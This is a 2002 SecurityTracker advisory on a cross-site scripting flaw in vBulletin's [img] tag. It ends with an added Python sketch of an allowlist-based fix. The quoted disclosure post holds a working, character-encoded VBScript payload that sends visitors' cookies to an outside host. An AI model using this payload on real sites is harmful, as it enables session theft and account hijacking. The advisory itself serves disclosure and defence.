SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   vBulletin
Vendors:   Jelsoft Enterprises
vBulletin Forum Software Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1003869
SecurityTracker URL:  http://securitytracker.com/id/1003869
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 21 2002
Impact:   Disclosure of authentication information, Execution of arbitrary code via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): prior to 2.2.3
Description:   A vulnerability was reported in the vBulletin bulletin board software. A remote user can conduct cross-site scripting attacks against other vBulletin users.

It is reported that a remote user can inject scripting code into posts and private messages within an IMG tag (which is apparently enabled by default). When the target (victim) user views the message, the code will be executed in the target user's browser. The code will originate from the system running vBulletin and will run in the security context of that system. As a result, the code will be able to access the target user's cookies associated with the vBulletin site.

Some demonstration exploit code is included in the Source Message.

Impact:   A remote user can cause arbitrary JavaScript to be executed in a target user's browser. The code will be able to access the target user's cookies associated with the site running the vBulletin software.
Solution:   The vendor has reportedly released a fixed version (2.2.4). See the Vendor URL for more information.
Vendor URL:  www.vbulletin.com/
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [img]-vulnerability in vBulletin Version 2.2.2 & 2.2.1 & maybe older


Hi

I've discovered a vulnerability in vBulletin's [img]-Tag
implementation
that allows users to inject vbs-code in posts and private messages
([img] is switched on by default).
Through that, an attacker is able to steal other users' cookies and
maybe hijack their accounts.

The following code sends the user's cookie to a php-script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser).
It is enclosed in a [code]-Tag, the URL is encoded in ASCII and
linebreaks are inserted to avoid filtering of some characters and
insertion of <br>-Tags.

[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]
  

History:
 Feb 19 02: contacted Jelsoft
 Feb 20 02: Vendor confirmed the bug
 Feb 21 02: Jelsoft claimed to have made a patch "which clamps
            down on what characters are allowed in an [img] tag,
            as well as requiring it to start with http://".
            Sounds good ;)


 vBulletin 2.2.3 & 2.2.4 have been out for some weeks, but there are still
 sites using vulnerable versions, so better update!
 

lates, Cano2                          mailto:Cano2@buhaboard.de

--

BuHa-Security Board
www.buhaboard.de
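
The fix quoted in the message's history (restricting the characters allowed in an [img] tag and requiring it to start with http://) can be sketched as an allowlist check applied before the tag is turned into HTML. This is an added example in Python, not Jelsoft's patch or code from the original post; the function names and the exact set of permitted characters are assumptions.

```python
import html
import re

# Assumed allowlist: the page does not give the vendor's exact character set.
# The URL must start with http:// and contain only common URL characters, so
# parentheses, quotes, whitespace and line breaks are all rejected.
SAFE_IMG_URL = re.compile(r"http://[A-Za-z0-9._~/%+=&?;,:@#-]+")
IMG_TAG = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)


def is_safe_img_url(url: str) -> bool:
    """True only if the whole string matches the allowlist (no trimming)."""
    return SAFE_IMG_URL.fullmatch(url) is not None


def render_img_tags(post: str) -> str:
    """HTML-escape the post, then convert only validated [img] tags."""
    escaped = html.escape(post, quote=True)

    def replace(match: re.Match) -> str:
        url = html.unescape(match.group(1))  # validate the raw URL text
        if not is_safe_img_url(url):
            return match.group(0)  # stays as inert, escaped text
        return '<img src="{}" alt="">'.format(html.escape(url, quote=True))

    return IMG_TAG.sub(replace, escaped)


# Constructed inputs; the second is a shortened form of the post's payload shape.
GOOD = "[img]http://example.com/avatar.gif[/img]"
BAD = "[img]vbscript:location.replace(\nchr(104)+chr(116)\n)[/img]"

if __name__ == "__main__":
    print(render_img_tags(GOOD))
    print(render_img_tags(BAD))
```

Because the check uses a full match on the untrimmed tag contents, the line breaks and parentheses that the posted payload relies on cause the tag to be left as plain text rather than rendered.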


 
 



Copyright 2019, SecurityGlobal.net LLC